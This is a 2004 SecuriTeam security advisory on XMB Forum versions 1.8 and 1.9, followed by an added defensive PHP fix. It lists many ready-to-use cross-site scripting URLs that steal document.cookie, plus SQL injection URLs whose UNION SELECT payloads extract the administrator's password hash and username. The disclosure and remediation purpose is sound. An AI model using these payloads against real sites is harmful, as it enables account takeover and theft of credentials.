[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
To: list@securiteam.com Date: 30 Mar 2004 13:13:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)
------------------------------------------------------------------------
SUMMARY
<http://www.xmbforum.com/> XMB Forum is "a free web-based bulletin board system written in PHP with a MySQL backend."
Multiple vulnerabilities have been found in XMB, including several cross-site scripting bugs, SQL injections and information disclosure.

DETAILS
Vulnerable Systems:
* XMB version 1.8 Partagium SP3
* XMB version 1.9 Nexus beta

PHP and web server information disclosure
Beginning with the new Nexus release of XMB, the file named phpinfo.php has been added to the forum package. A snippet from the original code can be used to reveal the PHP version and information about the web server:
<?php
/* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
phpinfo();
?>
Not only can a user access phpinfo(), there is also a possible cross site scripting vulnerability. An example follows:
http://localhost/xmb19beta/phpinfo.php?foobar=
Note that the SCRIPT tag has been replaced with SCR!PT.

Cross site scripting
http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body onload=a!ert(document.cookie);>
Note: Logout before issuing the request, otherwise it will not work. The alert action was replaced with a!ert. Another cross-site scripting vulnerability exists in editprofile.php (only the latest version 1.9 is vulnerable). An example request that exploits it:
http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader= onload=alert(document.cookie);>
A cross site scripting bug exists in u2u.php as well. An example would be:
http://localhost/xmb19beta/u2u.php?folder=foobar"><body onload=a!ert(document.cookie);>
And in the stats.php file there is more than one cross site scripting bug due to uninitialized variables ($viewmost, $replymost, $latest). Examples:
http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body onload=a!ert(document.cookie);>
Another XSS bug exists in post.php where the $message and $icons variables are uninitialized. Examples:
http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons= onload=a!ert(document.cookie);>
In the forumdisplay.php script there are also uninitialized variables which open the way for cross site scripting. These are $threadlist, $pagelinks, $forumlist, $navigation and $forumdisplay:
http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist= onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks= onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist= onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation= onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay= onload=a!ert(document.cookie);>

SQL Injection and cross site scripting
http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp= onload=a!ert(document.cookie);>
Note: It will only work when no user is logged on, otherwise the $tpp variable will be overridden.
An SQL injection and a cross site-scripting bug in member.php (only version 1.9 is vulnerable) exists. Here is a snippet of code that shows the bug, line 461:
switch($self['status']){
    case 'member';
        $restrict .= " f.private !='3' AND";
        $restrict .= " f.private != '2' AND";
        $restrict .= " f.userlist = '' AND f.password = '' AND";
        break;
    case 'Moderator';
    case 'Super Moderator';
    case 'Administrator';
    case 'Super Administrator';
    default:
        $restrict .= " f.private !='3' AND f.private != '2' AND f.userlist = '' AND f.password = '' AND";
        break;
}
It is easily discernible that the $restrict variable is not initialized before being appended to, and hence the restrict request parameter opens up an SQL injection:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
Or a cross-site scripting if one wishes:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= onload=a!ert(document.cookie);>
Better yet, it's possible to retrieve the admin's MD5 password hash from the database in the following manner:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
Or the admin's username:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
Yet more SQL injections and XSS vulnerabilities exist, this time in the misc.php script (only version 1.9 is vulnerable). Examples follow:
http://localhost/xmb19beta/misc.php?action=search&restrict= onload=a!ert(document.cookie);>
http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99 UNION SELECT null, null,password, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*
Another SQL injection and XSS in today.php exists. However, only version 1.9 is vulnerable:
http://localhost/xmb19beta/today.php?restrict= onload=alert(document.cookie);>

ADDITIONAL INFORMATION
The information has been provided by <mailto:come2waraxe@yahoo.com> Janek Vind.
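As an added, defender-side example that is not part of this advisory or of XMB's own code: the two fixes the findings above call for, building $restrict from the trusted session status only (the member.php, misc.php and today.php bugs) and HTML-encoding template variables at output (the stats.php, post.php and forumdisplay.php bugs). Role names follow the advisory's member.php snippet; which clause each role receives, and the function names, are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not XMB's code. Role names follow the advisory's member.php
// snippet; which clause each role receives is an illustrative assumption.

// Builds the forum-access WHERE fragment from the trusted session status only.
// The advisory's bug: $restrict was never initialised, so a ?restrict=... request
// parameter could supply its starting value and land unquoted in the SQL. The
// explicit initialisation below, plus never reading request data here, closes that.
function forum_restrict(array $self): string
{
    $restrict = '';
    switch ($self['status'] ?? '') {
        case 'Moderator':
        case 'Super Moderator':
        case 'Administrator':
        case 'Super Administrator':
            break;                            // assumption: staff see every forum
        case 'member':
        default:                              // guests/unknown: most restrictive
            $restrict .= " f.private != '3' AND f.private != '2'"
                       . " AND f.userlist = '' AND f.password = '' AND";
            break;
    }
    return $restrict;
}

// Encodes a value at the point it is echoed into HTML; this is what the template
// variables ($viewmost, $latest, $threadlist, ...) reflected raw by XMB needed.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request reusing the advisory's payload shapes.
$_GET = [
    'action'   => 'viewpro',
    'member'   => 'alice',
    'restrict' => " f.private=-99 /*",
    'viewmost' => '"></textarea><body onload=alert(document.cookie);>',
];
$self = ['status' => 'member'];

$clause = forum_restrict($self);
if (strpos($clause, $_GET['restrict']) !== false) {
    throw new RuntimeException('request data reached the SQL clause');
}
echo 'WHERE' . $clause . " 1=1\n";                               // request value absent
echo '<textarea>' . html($_GET['viewmost']) . "</textarea>\n";   // tags rendered inert
```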
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.